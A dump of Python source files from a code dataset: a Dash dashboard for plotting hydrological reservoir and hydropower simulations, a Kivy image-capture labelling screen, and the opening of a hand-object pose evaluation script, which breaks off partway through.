+{"seq_id":"283373670","text":"from itertools import product\nimport os\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport plotly.graph_objs as go\nimport dash_core_components as dcc\nimport dash_daq as daq\nimport dash_html_components as html\n\nfrom dashapp.metrics import nash_sutcliffe_efficiency, percent_bias, root_mean_square_error\nfrom dashapp.functions import get_resources, flow_to_energy, consolidate_dataframe, load_timeseries, agg_by_resources\nfrom dashapp.constants import PLOTLY_CONFIG, ABS_DIFF, PCT_DIFF, MCM_TO_CFS, MCM_TO_TAF, PROD_RESULTS_PATH, \\\n DEV_RESULTS_PATH, BASINS\n\nOBSERVED_TEXT = 'Observed'\nOBSERVED_COLOR = 'lightgrey'\n\nAXIS_LABELS = {\n 'storage': 'Storage (TAF)',\n 'flow': 'Flow (cfs)',\n 'generation': 'Generation (MWh)',\n 'M': 'Month',\n 'Y': 'Year'\n}\n\nPALETTES = {\n 'P2009': 'Blues_r',\n 'P2030': 'BuGn_r',\n 'P2060': 'OrRd_r'\n}\n\nFLOOD_CONTROL_RESERVOIRS = ['New Melones Lake', 'Lake Tulloch', 'Don Pedro Reservoir', 'Millerton Lake']\n\npercentiles_ordered = {\n ('median', 'quartiles'): ['quartiles', 'median'],\n ('median', 'quartiles', 'range'): ['range', 'quartiles', 'median'],\n ('quartiles', 'range'): ['range', 'quartiles'],\n ('median', 'range'): ['range', 'median']\n}\n\n\ndef indicator(id, label, value, color):\n return html.Div(\n [\n label + ': ', value,\n daq.Indicator(\n color=color,\n value=True\n )\n ],\n id=id,\n style={'display': 'inline-block'}\n )\n\n\ndef percentile_timeseries_graphs(df, name, options, color='black'):\n pcts = []\n show_mean = False\n percentiles = options[:]\n if 'mean' in options:\n show_mean = True\n percentiles.pop(options.index('mean'))\n\n pct_set = tuple(set(percentiles))\n\n span_pcts = {\n 'median': [0.5],\n 'quartiles': [0.25, 0.75],\n 'range': [0.0, 1.0]\n }\n\n lines = []\n for i, span in enumerate(percentiles_ordered.get(pct_set, list(pct_set))):\n pcts = span_pcts[span]\n for j, pct in enumerate(pcts):\n fill = None\n showlegend = i == 0\n width = 2\n opacity = 0.0\n if len(pcts) > 1:\n width = 0\n if j == 0:\n showlegend = False\n elif j == 1:\n fill = 'tonexty'\n lines.append(\n go.Scatter(\n x=df.index,\n y=df.quantile(pct, axis=1),\n showlegend=showlegend,\n mode='lines',\n fill=fill,\n text='{}: {}%'.format(name, pct * 100),\n name=name,\n line=dict(color=color, width=width)\n )\n )\n if show_mean:\n lines.append(\n go.Scatter(\n x=df.index,\n y=df.mean(axis=1),\n showlegend=False,\n mode='lines',\n text='{} mean'.format(name),\n name=name,\n # line=dict(color=color, width=3)\n )\n )\n\n return lines\n\n\ndef boxplots_graphs(df, name, percentiles, color='black'):\n plot = go.Box(\n y=df.values.flatten(),\n name=name,\n )\n return [plot]\n\n\ndef timeseries_component(attr, res_name, all_sim_vals, df_obs, **kwargs):\n res_name_id = res_name.lower().replace(' ', '_')\n ts_data = []\n fd_data = []\n\n gauge_lookup = kwargs.get('gauge_lookup')\n metric = kwargs.get('metric')\n metric = metric != 'default' and metric\n resample = kwargs.get('resample')\n constraints = kwargs.get('constraints', [])\n percentiles = kwargs.get('percentiles')\n consolidate = kwargs.get('consolidate')\n calibration = kwargs.get('calibration')\n climates = kwargs.get('climates')\n rcps = kwargs.get('rcps')\n percentiles_type = kwargs.get('percentiles_type', 'timeseries')\n scenario_combos = kwargs.get('scenario_combos', [])\n head = kwargs.get('head')\n layout = kwargs.get('layout_options', [])\n compact = kwargs.get('compact', False)\n show_fd = 'flow-duration' in layout and not compact\n show_fc = 'guide' in constraints\n color_idx = -1\n\n # Variables for observed data\n obs_vals = None\n gauges = []\n gauge_name = gauge_lookup.get(res_name, res_name)\n\n fc_df = None\n if attr == 'storage' and show_fc and res_name in FLOOD_CONTROL_RESERVOIRS:\n basin = kwargs.get('basin')\n basin_full_name = '{} River'.format(BASINS[basin])\n data_path = os.environ['SIERRA_DATA_PATH']\n filename = '{} Flood Control Curve mcm.csv'.format(res_name)\n fcpath = os.path.join(data_path, basin_full_name, 'management', 'BAU', 'Flood Control', filename)\n flood_control_curve = pd.read_csv(fcpath, index_col=0, header=0).iloc[:, 0] / 1.2335 # mcm to TAF\n fc_df = pd.DataFrame(index=all_sim_vals.index)\n fc_df['Rainflood space'] = fc_df.index.strftime('%#m-%#d')\n fc_df.replace({'Rainflood space': flood_control_curve}, inplace=True)\n\n ts_data.append(\n go.Scatter(\n x=fc_df.index,\n y=fc_df['Rainflood space'],\n text='Flood Curve',\n mode='lines',\n opacity=0.7,\n # opacity=0.7 if not plot_max else 0.0,\n name='Flood Curve',\n line_color='red'\n )\n )\n\n for i, forcing in enumerate(set(all_sim_vals.columns.get_level_values(0))):\n parts = forcing.split('/')[1].split('_')\n rcp = None\n if len(parts) == 1:\n gcm, = parts\n else:\n gcm, rcp = parts\n\n if climates and gcm not in climates:\n continue\n\n if 'Livneh' not in forcing and rcps and rcp not in rcps:\n continue\n\n # sim_color = sns.color_palette(PALETTES[priceyear]).as_hex()[GCMS.index(gcm)]\n # sim_color = sns.color_palette().as_hex()[i]\n # sim_color = None\n resource_scenario_sim_vals = all_sim_vals[forcing, res_name]\n # for multiindex in resource_scenario_sim_vals.columns:\n # sim_vals = resource_scenario_sim_vals[multiindex]\n for i, scenario_combo in enumerate(scenario_combos):\n\n color_idx += 1\n sim_color = sns.color_palette().as_hex()[color_idx]\n\n if scenario_combo:\n scenario_name = '{} {}'.format(tuple(parts), scenario_combo)\n else:\n scenario_name = '-'.join(tuple(parts))\n\n if not scenario_combo:\n sim_vals = resource_scenario_sim_vals\n else:\n if len(scenario_combo) == 1:\n sim_vals = resource_scenario_sim_vals[scenario_combo[0]]\n else:\n sim_vals = resource_scenario_sim_vals[scenario_combo]\n if gcm == 'Livneh':\n sim_vals = sim_vals[sim_vals.index.year < 2020]\n else:\n sim_vals = sim_vals[sim_vals.index.year >= 2020]\n if head is not None:\n sim_vals = flow_to_energy(sim_vals, head)\n if resample:\n sim_resampled = sim_vals.dropna().resample(resample).mean()\n else:\n sim_resampled = sim_vals.dropna()\n\n # Prepare observed data\n if i == 0:\n obs_resampled = None\n if calibration and gauge_name in df_obs:\n obs_vals = df_obs[gauge_name]\n\n head = kwargs.get('head')\n if head:\n obs_vals = flow_to_energy(obs_vals, head)\n\n if not consolidate: # percentiles values will use the whole record\n obs_vals = obs_vals.reindex(sim_vals.index)\n\n if resample:\n obs_resampled = obs_vals.resample(resample, axis=0).mean()\n else:\n obs_resampled = obs_vals\n\n if consolidate: # use original values\n obs_cons = consolidate_dataframe(obs_resampled, resample)\n obs_vals = obs_cons.quantile(0.5, axis=1) # for use in flow-duration curve\n\n if metric == ABS_DIFF:\n sim_resampled -= obs_resampled\n elif metric == PCT_DIFF:\n sim_resampled = (sim_resampled / obs_resampled - 1.0) * 100.0\n\n plot_max = False\n max_reqt = kwargs.get('max_reqt')\n if max_reqt is not None and res_name in max_reqt[forcing] and 'max' in constraints:\n plot_max = True\n\n # Minimum flow requirement\n min_reqt = kwargs.get('min_reqt')\n show_min_reqt = not consolidate and min_reqt is not None and res_name in min_reqt[forcing] and 'min' in constraints\n if show_min_reqt:\n if resample:\n min_reqt_resampled = min_reqt.resample(resample).mean()\n else:\n min_reqt_resampled = min_reqt.copy()\n ts_data.append(\n go.Scatter(\n x=min_reqt_resampled[forcing].index,\n y=min_reqt_resampled[forcing][res_name],\n text='Min Flow',\n mode='lines',\n opacity=0.7,\n # opacity=0.7 if not plot_max else 0.0,\n name='Min Flow',\n line_color='red'\n )\n )\n\n # Maximum flow requirement\n if not consolidate and plot_max:\n ts_data.append(\n go.Scatter(\n x=max_reqt[forcing].index,\n y=max_reqt[forcing][res_name],\n text='Max Requirement',\n mode='lines',\n fill='tonexty',\n opacity=0.7,\n name='Max Requirement',\n line_color='lightblue',\n line=dict(width=0.5)\n )\n )\n\n if consolidate:\n try:\n sim_cons = consolidate_dataframe(sim_resampled, resample)\n except:\n print('Failed to consolidate: ', forcing)\n continue\n if percentiles_type == 'timeseries':\n sim_vals = sim_cons.quantile(0.5, axis=1)\n sim_data = percentile_timeseries_graphs(sim_cons, scenario_name, percentiles, color=sim_color)\n else:\n sim_data = boxplots_graphs(sim_cons, scenario_name, percentiles, color=sim_color)\n ts_data.extend(sim_data)\n\n else:\n ts_data.append(\n go.Scatter(\n x=sim_resampled.index,\n y=sim_resampled.values,\n text=scenario_name,\n mode='lines',\n opacity=0.7,\n name=scenario_name,\n line=dict(color=sim_color)\n )\n )\n\n N = len(sim_resampled)\n if show_fd:\n fd_data.append(\n go.Scatter(\n y=sorted(sim_resampled.values),\n x=np.arange(0, N) / N * 100,\n name=scenario_name,\n text=scenario_name,\n # line=dict(color=sim_color),\n mode='lines',\n opacity=0.7,\n )\n )\n\n pbias = 100\n nse = -1\n\n if calibration and obs_resampled is not None and not metric:\n\n # flow-duration curve\n N = len(obs_resampled)\n if show_fd:\n fd_data.insert(0,\n go.Scatter(\n y=sorted(obs_resampled.values),\n x=np.arange(0, N) / N * 100,\n name=OBSERVED_TEXT,\n text=OBSERVED_TEXT,\n mode='lines',\n opacity=0.7,\n line=dict(color=OBSERVED_COLOR)\n )\n )\n\n if consolidate:\n predictions = sim_resampled.values\n targets = obs_resampled.loc[sim_resampled.index].values\n else:\n predictions = sim_vals.values\n targets = obs_vals.loc[sim_vals.index].values\n\n pbias = percent_bias(predictions, targets) * 100\n # rmse = root_mean_square_error(predictions, targets)\n nse = nash_sutcliffe_efficiency(predictions, targets)\n\n if consolidate:\n obs_data = None\n if percentiles_type == 'timeseries':\n obs_data = percentile_timeseries_graphs(obs_cons, OBSERVED_TEXT, percentiles, color=OBSERVED_COLOR)\n elif percentiles_type == 'boxplots':\n obs_data = boxplots_graphs(obs_cons, OBSERVED_TEXT, percentiles, color=OBSERVED_COLOR)\n ts_data.extend(obs_data)\n else:\n obs_graph = go.Scatter(\n x=obs_resampled.index,\n y=obs_resampled,\n connectgaps=False,\n text=OBSERVED_TEXT,\n mode='lines',\n opacity=0.7,\n name=OBSERVED_TEXT,\n line=dict(color=OBSERVED_COLOR)\n )\n ts_data.insert(0, obs_graph)\n\n if calibration:\n if nse <= 0:\n nse_color = 'red'\n elif nse <= 0.5:\n nse_color = 'orange'\n else:\n nse_color = 'green'\n\n GAUGE_SIZE = 80\n\n nse_gauge = daq.Gauge(\n id='nse-gauge-' + res_name_id,\n label='NSE',\n size=GAUGE_SIZE,\n min=-1.0,\n value=nse,\n max=1.0,\n color=nse_color,\n )\n # nse_gauge = indicator(\n # id='nse-gauge-' + res_name_id,\n # label='NSE',\n # value=round(nse, 2),\n # color=nse_color,\n # )\n\n if abs(pbias) >= 20:\n pbias_color = 'red'\n elif abs(pbias) >= 10:\n pbias_color = 'orange'\n else:\n pbias_color = 'green'\n\n pbias_gauge = daq.Gauge(\n id='pbias-gauge-' + res_name_id,\n label='% bias',\n size=GAUGE_SIZE,\n min=min(pbias, -100.0),\n value=pbias,\n max=max(pbias, 100.0),\n color=pbias_color\n )\n # pbias_gauge = indicator(\n # id='pbias-gauge-' + res_name_id,\n # label='% bias',\n # value=round(pbias, 2),\n # color=pbias_color\n # )\n\n gauges = html.Div(\n [nse_gauge, pbias_gauge]\n )\n\n ylabel = AXIS_LABELS.get(attr, 'unknown')\n\n CLASS_NAME = 'timeseries-chart'\n PLOTLY_CONFIG['displayModeBar'] = not compact and 'toolbar' in layout\n\n if compact:\n style = {\n 'height': 200,\n 'width': 400\n }\n elif show_fd:\n style = {\n 'height': 300,\n 'width': \"70%\"\n }\n else:\n style = {\n 'height': 300,\n 'width': \"100%\"\n }\n\n layout_kwargs = dict(\n xaxis={'title': AXIS_LABELS.get(resample, \"Date\"), 'tickangle': -45},\n yaxis={'title': ylabel, 'rangemode': 'tozero'},\n margin={'l': 60, 'b': 80, 't': 40, 'r': 10},\n showlegend=not compact,\n legend={'x': 0.02, 'y': 0.98},\n hovermode='closest',\n yaxis_type=kwargs.get('transform', 'linear'),\n )\n if compact:\n del layout_kwargs['xaxis']['title']\n layout_kwargs['margin'].update(b=60, t=30)\n layout_kwargs['title'] = res_name\n\n timeseries_graph = dcc.Graph(\n id='timeseries-{}'.format(res_name_id),\n # className=CLASS_NAME,\n style=style,\n config=PLOTLY_CONFIG,\n figure={\n 'data': ts_data,\n 'layout': go.Layout(\n **layout_kwargs\n ),\n }\n )\n\n children = [timeseries_graph]\n\n if show_fd:\n flow_duration_graph = dcc.Graph(\n id='flow-duration-' + res_name_id,\n className='flow-duration-chart',\n config=PLOTLY_CONFIG,\n figure={\n 'data': fd_data,\n 'layout': go.Layout(\n # title='{}-duration'.format(attr.title()),\n xaxis={'title': 'Duration (%)'},\n yaxis={'title': ylabel},\n margin={'l': 60, 'b': 80, 't': 40, 'r': 10},\n legend={'x': 0.05, 'y': 0.95},\n hovermode='closest',\n yaxis_type=kwargs.get('transform', 'linear')\n )\n },\n style={\"width\": \"30%\"}\n )\n children.append(flow_duration_graph)\n\n div = html.Div(\n # key='{}'.format(consolidate),\n children=[\n not compact and html.H5(res_name),\n html.Div(\n children=children,\n className=\"timeseries-metrics-data\",\n )\n ],\n className=\"timeseries-metrics-box\",\n style={\n 'margin': 10 if compact else 'initial'\n }\n )\n\n return div\n\n\ndef timeseries_collection(tab, **kwargs):\n children = []\n resources = kwargs.pop('resources', None)\n basin_scenarios = kwargs.pop('basin_scenarios', {})\n selected_scenarios = kwargs.pop('selected_scenarios', [])\n gauge_lookup = kwargs.get('gauge_lookup')\n df_obs_streamflow = kwargs.pop('df_obs_streamflow', None)\n df_obs_storage = kwargs.pop('df_obs_storage', None)\n consolidate = \"consolidate\" in kwargs.get('consolidate', [])\n kwargs['consolidate'] = consolidate\n kwargs['compact'] = compact = 'compact' in kwargs.get('layout_options', [])\n\n resample = kwargs.get('resample')\n aggregate = kwargs.get('aggregate')\n basin = kwargs.get('basin')\n if not basin:\n return [\"Select a basin.\"]\n\n climates = kwargs.get('climates')\n rcps = kwargs.get('rcps')\n calibration = climates is None\n run_name = kwargs.get('run_name', 'development')\n\n load_data_kwargs = dict(\n run=run_name,\n nscenarios=max(len(basin_scenarios), 1),\n aggregate=aggregate,\n filterby=resources,\n basin_scenarios=basin_scenarios\n )\n\n kwargs['scenario_combos'] = list(product(*selected_scenarios))\n\n if run_name == 'development':\n results_path = DEV_RESULTS_PATH\n else:\n results_path = os.path.join(PROD_RESULTS_PATH, run_name)\n\n kwargs['calibration'] = calibration\n\n if calibration:\n forcings = ['historical/Livneh']\n else:\n # rcp = 'rcp85'\n forcings = list(product(climates, rcps))\n if not forcings:\n return \"Please select at least one climate and rcp\"\n\n if consolidate and resample == 'Y':\n return 'Sorry, you cannot consolidate annually resampled data.'\n\n facility_class, attr, unit = tab.split('-')\n\n if tab == 'reservoir-storage':\n attr = 'storage'\n df_storage = load_timeseries(results_path, basin, forcings, 'Reservoir', 'Storage',\n multiplier=MCM_TO_TAF, **load_data_kwargs)\n kwargs.pop('transform', None)\n if resample:\n obs = df_obs_storage.resample(resample).mean()\n else:\n obs = df_obs_storage\n filtered_resources = get_resources(df_storage, filterby=aggregate or resources)\n for res in filtered_resources:\n component = timeseries_component(attr, res, df_storage, obs, **kwargs)\n children.append(component)\n\n else:\n df_hp_flow = None\n # df_obs = df_obs_streamflow.loc[df_hydropower.index]\n if resample:\n obs = df_obs_streamflow.resample(resample).mean()\n else:\n obs = df_obs_streamflow\n\n if tab in ['hydropower-generation', 'hydropower-flow', 'system']:\n hp = []\n df_hp1 = None\n df_hp2 = None\n\n try:\n df_hp1 = load_timeseries(results_path, basin, forcings, 'PiecewiseHydropower', 'Flow',\n **load_data_kwargs) * MCM_TO_CFS\n except:\n pass\n if df_hp1 is not None:\n hp.append(df_hp1)\n\n try:\n df_hp2 = load_timeseries(results_path, basin, forcings, 'Hydropower', 'Flow',\n **load_data_kwargs) * MCM_TO_CFS\n except:\n pass\n if df_hp2 is not None:\n hp.append(df_hp2)\n if hp:\n df_hp_flow = pd.concat(hp, axis=1)\n\n if aggregate and df_hp_flow is not None:\n df_hp_flow = agg_by_resources(df_hp_flow, aggregate)\n\n if tab in ['hydropower-generation', 'system']:\n path = '../data/{} River/fixed_head.csv'.format(basin.title())\n if os.path.exists(path):\n fixed_head = pd.read_csv(path, index_col=0, squeeze=True).to_dict()\n else:\n fixed_head = {}\n\n if tab == 'hydropower-flow':\n attr = 'flow'\n if df_hp_flow is not None:\n for res in get_resources(df_hp_flow, filterby=aggregate or resources):\n component = timeseries_component(attr, res, df_hp_flow, obs, **kwargs)\n children.append(component)\n\n elif tab == 'hydropower-generation':\n attr = 'generation'\n if df_hp_flow is not None:\n for res in get_resources(df_hp_flow, filterby=resources):\n if res not in fixed_head:\n continue # TODO: update to include non-fixed head\n head = fixed_head[res]\n component = timeseries_component(attr, res, df_hp_flow, obs, head=head, **kwargs)\n children.append(component)\n\n elif tab == 'outflow':\n attr = 'flow'\n df = load_timeseries(results_path, basin, forcings, 'Output', 'Flow',\n multiplier=MCM_TO_CFS, **load_data_kwargs)\n for res in get_resources(df, filterby=resources):\n component = timeseries_component(attr, res, df, obs, **kwargs)\n children.append(component)\n\n # elif tab == 'ifr-flow':\n # attr = 'flow'\n # df = load_timeseries(results_path, basin, forcings, 'InstreamFlowRequirement', 'Flow',\n # multiplier=MCM_TO_CFS, **load_data_kwargs)\n # reqt = load_timeseries(results_path, basin, forcings, 'InstreamFlowRequirement', 'Requirement',\n # multiplier=MCM_TO_CFS, **load_data_kwargs)\n # for res in get_resources(df, filterby=resources):\n # component = timeseries_component(attr, res, df, obs, min_reqt=reqt, **kwargs)\n # children.append(component)\n\n elif tab == 'ifr-flow':\n attr = 'flow'\n # if basin == 'stn':\n # pywr_param_name = 'PiecewiseInstreamFlowRequirement'\n # else:\n pywr_param_name = 'InstreamFlowRequirement'\n df = load_timeseries(results_path, basin, forcings, pywr_param_name, 'Flow',\n multiplier=MCM_TO_CFS, **load_data_kwargs)\n df_pw_min_ifr_reqt = load_timeseries(\n results_path, basin, forcings, pywr_param_name, 'Min Flow',\n multiplier=MCM_TO_CFS, **load_data_kwargs)\n df_pw_ifr_range_reqt = load_timeseries(\n results_path, basin, forcings, pywr_param_name, 'Max Flow',\n multiplier=MCM_TO_CFS, **load_data_kwargs)\n\n if df_pw_min_ifr_reqt is not None and df_pw_ifr_range_reqt is not None:\n df_pw_max_ifr_reqt = df_pw_min_ifr_reqt[df_pw_ifr_range_reqt.columns] + df_pw_ifr_range_reqt\n else:\n df_pw_max_ifr_reqt = None\n\n for res in get_resources(df, filterby=resources):\n component = timeseries_component(\n attr, res, df, obs,\n min_reqt=df_pw_min_ifr_reqt,\n max_reqt=df_pw_max_ifr_reqt,\n **kwargs\n )\n children.append(component)\n\n elif tab == 'system':\n\n # System generation\n system_res = 'System generation'\n if df_hp_flow is not None:\n gauged_hp = [c for c in df_hp_flow.columns if gauge_lookup.get(c) in obs]\n gauge_lookup[system_res] = system_res\n\n df_sim_scenarios = []\n df_obs = []\n df_sim_system = None\n df_obs_system = None\n for i, forcing in enumerate(forcings):\n dfs_sim = []\n for res in get_resources(df_hp_flow):\n head = fixed_head.get(res)\n hp_gauge = gauge_lookup.get(res)\n if not head or not hp_gauge:\n continue\n sim_energy = flow_to_energy(df_hp_flow[forcing, res], head)\n dfs_sim.append(sim_energy)\n if i == 0:\n obs_energy = flow_to_energy(obs[hp_gauge], head)\n df_obs.append(obs_energy)\n if dfs_sim:\n concatenated_summed = pd.concat(dfs_sim, axis=1).dropna().sum(axis=1)\n df_sim_scenarios.append(concatenated_summed)\n if df_sim_scenarios:\n df_sim_system = pd.concat(df_sim_scenarios, axis=1, keys=forcings)\n df_sim_system.columns = pd.MultiIndex.from_product([forcings, (system_res,)])\n\n if df_obs:\n df_obs_system = pd.concat(df_obs, axis=1).sum(axis=1).to_frame(system_res)\n\n if df_sim_system is not None:\n hp_component = timeseries_component('generation', system_res, df_sim_system, df_obs_system,\n **kwargs)\n children.append(hp_component)\n\n return html.Div(\n children=children,\n className=\"timeseries-collection\",\n style={\n 'display': 'flex',\n 'flexWrap': 'wrap',\n 'flexDirection': 'column' if not compact else None\n }\n )\n","sub_path":"dashapp/components - old.py","file_name":"components - old.py","file_ext":"py","file_size_in_byte":26718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"206462611","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom kivy.uix.screenmanager import Screen\nfrom kivy.properties import StringProperty\nfrom kivy.core.text import Label as CoreLabel\nfrom kivy.graphics.texture import Texture\nfrom kivy.graphics import Rectangle\nfrom kivy.clock import Clock\nimport iod.switches as sw\nfrom Queue import Queue\nimport time\nimport cv2\nimport os\n\nLABEL = ['2L', 'L', 'M', 'S', '2S', 'BL', 'BM', 'BS', 'C', 'None']\n\nSTATE_SPLASH = 0\nSTATE_CAPTURING = 1\nSTATE_CAPTURED = 2\nSTATE_SAVING = 3\n\nSAVE_DIR = \"./database\"\n\nclass LearningScreen(Screen):\n\t_center_text = StringProperty()\n\t_label_text = StringProperty()\n\n\tdef __init__(self, cam, sws, **kwargs):\n\t\tsuper(Screen, self).__init__(**kwargs)\n\n\t\tself._cam = cam\n\t\tself._looper = None\n\t\tself._label_id = 0\n\t\tself._center_text = ''\n\t\tself._label_text = ''\n\t\tself._req_commit = Queue(1)\n\t\tself._sws = sws\n\t\tself._captured_images = None\n\n\tdef on_enter(self):\n\t\tself._sws.enter_sw.register_listener(self.on_btn_changed)\n\t\tself._looper = Clock.schedule_interval(self.on_loop, 0.3)\n\t\tself._center_text = 'Learning Mode'\n\t\tself._label_text = LABEL[self._label_id]\n\t\tself._splash_wait = 7\n\t\tself._state = STATE_SPLASH\n\n\tdef on_btn_changed(self, on_event):\n\t\tif on_event:\n\t\t\tself._req_commit.put(True)\n\n\tdef on_leave(self):\n\t\tself._sws.enter_sw.unregister_listener()\n\t\tself._looper.cancel()\n\n\tdef draw_captured_images(self, images, select):\n\t\tdraw_x_pos = 10\n\t\tdraw_y_pos = self.height - 10\n\t\t\n\t\tcanvas = self.ids.monitor.canvas\n\t\tcanvas.clear()\n\t\twith canvas:\n\t\t\tfor img in images:\n\t\t\t\timg = cv2.flip(img, 0)\n\t\t\t\ttexture = Texture.create(size=(img.shape[1], img.shape[0]), colorfmt=\"rgb\")\n\t\t\t\ttexture.blit_buffer(img.tostring(), bufferfmt=\"ubyte\", colorfmt=\"rgb\")\n\t\t\t\ttexture_size = list(texture.size)\n\n\t\t\t\tRectangle(texture=texture, pos=(draw_x_pos, draw_y_pos - img.shape[0]), size=texture_size)\n\n\t\t\t\tdraw_x_pos += texture_size[0] + 10\n\n\t\t\ttext = CoreLabel(text=\"Would you like to add the images?\", color=(0,0,0,1), font_size=40)\n\t\t\ttext.refresh()\n\t\t\ttexture = text.texture\n\t\t\ttexture_size = list(texture.size)\n\t\t\tRectangle(texture=texture, pos=(10,500), size=texture_size)\n\n\t\t\tlabel_text = CoreLabel(text=\"Label : %s\"%(LABEL[self._label_id]), color=(0,0,0,1), font_size=70)\n\t\t\tlabel_text.refresh()\n\t\t\ttexture = label_text.texture\n\t\t\ttexture_size = list(texture.size)\n\t\t\tRectangle(texture=texture, pos=(10,410), size=texture_size)\n\n\t\t\tif select < 0:\n\t\t\t\tyes_text = CoreLabel(text=\"YES\", color=(1.0, 0.4, 0.7, 1.0), font_size=50)\n\t\t\t\tyes_text.refresh()\n\t\t\t\ttexture = yes_text.texture\n\t\t\t\ttexture_size = list(texture.size)\n\t\t\t\tRectangle(texture=texture, pos=(100,320), size=texture_size)\n\n\t\t\t\tno_text = CoreLabel(text=\"NO\", color=(0.4, 0.7, 1.0, 1.0), font_size=30)\n\t\t\t\tno_text.refresh()\n\t\t\t\ttexture = no_text.texture\n\t\t\t\ttexture_size = list(texture.size)\n\t\t\t\tRectangle(texture=texture, pos=(300,320), size=texture_size)\n\n\t\t\telse:\n\t\t\t\tyes_text = CoreLabel(text=\"YES\", color=(1.0, 0.4, 0.7, 1.0), font_size=30)\n\t\t\t\tyes_text.refresh()\n\t\t\t\ttexture = yes_text.texture\n\t\t\t\ttexture_size = list(texture.size)\n\t\t\t\tRectangle(texture=texture, pos=(100,320), size=texture_size)\n\n\t\t\t\tno_text = CoreLabel(text=\"NO\", color=(0.4, 0.7, 1.0, 1.0), font_size=50)\n\t\t\t\tno_text.refresh()\n\t\t\t\ttexture = no_text.texture\n\t\t\t\ttexture_size = list(texture.size)\n\t\t\t\tRectangle(texture=texture, pos=(300,320), size=texture_size)\n\n\t\t\ts_text = CoreLabel(text=\"/\", color=(0, 0, 0, 1), font_size=30)\n\t\t\ts_text.refresh()\n\t\t\ttexture = s_text.texture\n\t\t\ttexture_size = list(texture.size)\n\t\t\tRectangle(texture=texture, pos=(220,320), size=texture_size)\n\n\tdef canvas_clear(self):\n\t\tcanvas = self.ids.monitor.canvas\n\t\tcanvas.clear()\n\n\tdef _task(self):\n\t\tif self._state==STATE_SPLASH:\n\t\t\tself._splash_wait -= 1\n\t\t\tif self._splash_wait == 0:\n\t\t\t\tself._center_text = \"\"\n\t\t\t\tself._state = STATE_CAPTURING\n\t\telif self._state==STATE_CAPTURING:\n\t\t\tcaptured = self.capture()\n\t\t\tif captured is not None:\n\t\t\t\tself._captured_images = captured\n\t\t\t\tself._state = STATE_CAPTURED\n\t\telif self._state==STATE_CAPTURED:\n\t\t\tselect = self._sws.select_meter.get_balance()\n\t\t\tself.draw_captured_images(self._captured_images, select)\n\t\t\tif not self._req_commit.empty():\n\t\t\t\tself._req_commit.get(block=False)\n\t\t\t\tif select < 0:\n\t\t\t\t\tself._state = STATE_SAVING\n\t\t\t\telse:\n\t\t\t\t\tself._state = STATE_CAPTURING\n\t\t\t\tself.canvas_clear()\n\t\telif self._state==STATE_SAVING:\n\t\t\tfor i,img in enumerate(self._captured_images):\n\t\t\t\tname = LABEL[self._label_id] + time.strftime(\"_%Y%m%d%H%M%S\", time.localtime())\n\t\t\t\tname = \"%s%d.jpg\"%(name,i)\n\t\t\t\tpath = os.path.join(SAVE_DIR,name)\n\t\t\t\tcv2.imwrite(path, img)\n\t\t\tself._state = STATE_CAPTURING\n\n\n\tdef on_loop(self, dt):\n\t\tstart = time.time()\n\t\tif self._state==STATE_CAPTURING:\n\t\t\tv = self._sws.select_meter.get_volume()\n\t\t\tself._label_id = int(v*9)\n\t\t\tself._label_text = LABEL[self._label_id]\n\n\t\tmode = self._sws.get_mode_str()\n\t\tif mode=='learning':\n\t\t\tself._task()\n\t\telse:\n\t\t\tself.manager.current = mode\n\t\t\t\n\t\t#print(\"learning\", time.time()-start)\n\t\t\n\tdef capture(self):\n\t\tresult = self._cam.capture()\n\n\t\tif not self._req_commit.empty():\n\t\t\tself._req_commit.get(block=False)\n\t\t\tif not result.moving and len(result.images) > 0:\n\t\t\t\treturn result.images\n\t\t\t\n\t\treturn None\n","sub_path":"cicrops/screen/learning_screen.py","file_name":"learning_screen.py","file_ext":"py","file_size_in_byte":5266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"332310008","text":"from config import *\nimport sys\nsys.path.append(PROJECT_PATH)\n\nimport torch\nfrom dataset.HO_Data.codelab_util import *\nfrom dataset.HO_Data.convert import *\nfrom networks.HO_Nets.HO_Posenet import HO_Posenet\nimport argparse\nimport shutil\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--saveJSON', type=bool, default=False, help='save json or not')\nparser.add_argument('--handout', type=str, default='hand_pnet_{}.json'.format(validset), help='File to save the predictions.')\nparser.add_argument('--objout', type=str, default='obj_pnet_{}.json'.format(validset), help='File to save the predictions.')\nparser.add_argument('--figMode', default='2D',choices=['2D', '3DPC',''])\nparser.add_argument('--multi_GPU', type=bool, default=True,help='If the model to load was trained in multi-GPU')\nargs = parser.parse_args()\n#######################################################################################\n###################### Model weights load ###########################\nprint('==> Constructing model ... HO_PNet')\nposenet = HO_Posenet(input_channels=1, hand_channels=handpoints_num, obj_channels=objpoints_num)\nif(args.multi_GPU):\n posenet = torch.nn.DataParallel(posenet)\nposenet = posenet.to(device, dtype)\nposenet.load_state_dict(torch.load(PNet_ckpt)['model_state_dict'])\n\n#######################################################################################\n##################### Validate #################\nprint('==> Testing ..')\nfolder_path = DATA_DIR + '/' + validset\nfile_path = DATA_DIR + '/' + validset + '.txt'\ntransform = V2VVoxelization(cubic_size=200, augmentation=False)\n\n# init output containers\nhand_xyz_list= list()\nobj_xyz_list = list()\nhand_out_path = PROJECT_PATH+'/'+args.handout\nobj_out_path = PROJECT_PATH + '/' + args.objout\n\n############### savefig dir ###########\nif (args.figMode != ''):\n saveFolder = SAVEFIG_DIR + '/PNet/'\n if (os.path.exists(saveFolder)):\n shutil.rmtree(saveFolder)\n os.mkdir(saveFolder)\n\nwith open(file_path) as tf:\n records = tf.readlines()\n #random.shuffle(records)\n for record in records:\n print(record)\n folder, file = tuple(record.rstrip().split('/'))\n depthpath = os.path.join(folder_path, folder, 'depth', file + '.png')\n annotpath = os.path.join(folder_path, folder, 'meta', file + '.pkl')\n depth = read_depth_img(depthpath)\n annot = np.load(annotpath, allow_pickle=True)\n camMat = annot['camMat']\n fx = camMat[0, 0]\n fy = camMat[1, 1]\n ux = camMat[0, 2]\n uy = camMat[1, 2]\n\n if (validset != 'evaluation'):\n handJoints = annot['handJoints3D']\n handJoints = handJoints[jointsMapManoToSimple]\n objCorners = annot['objCorners3D']\n gt_hand_uvd = project_3D_points(camMat, handJoints)\n gt_obj_uvd = project_3D_points(camMat, objCorners)\n ################ get the common center point of hand and object 